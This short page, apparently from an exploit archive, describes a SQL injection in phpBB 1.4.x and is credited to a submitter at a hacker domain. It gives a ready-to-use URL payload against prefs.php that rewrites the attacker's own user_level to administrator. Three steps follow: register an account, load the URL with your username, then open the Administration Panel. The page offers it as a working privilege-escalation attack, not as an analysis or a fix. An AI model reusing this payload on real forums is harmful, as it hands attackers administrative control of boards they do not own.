|
|
PHPBB Remote SQL Query Manipulation Vulnerability
This example was submitted by <kill-9@modernhackers.com>: http://sitename/phpBBfolder/prefs.php?save=1 &viewemail=1',user_level%3D'4'%20where% 20username%3D'l337h4x0r'%23 Summary: 1. Register an account on a phpBB board version 1.4.x . 2. Enter above URL with the correct sitename and replace l337h4x0r with your username. 3. Click on "Administration Panel" near the bottom of the page. |
|
Privacy Statement |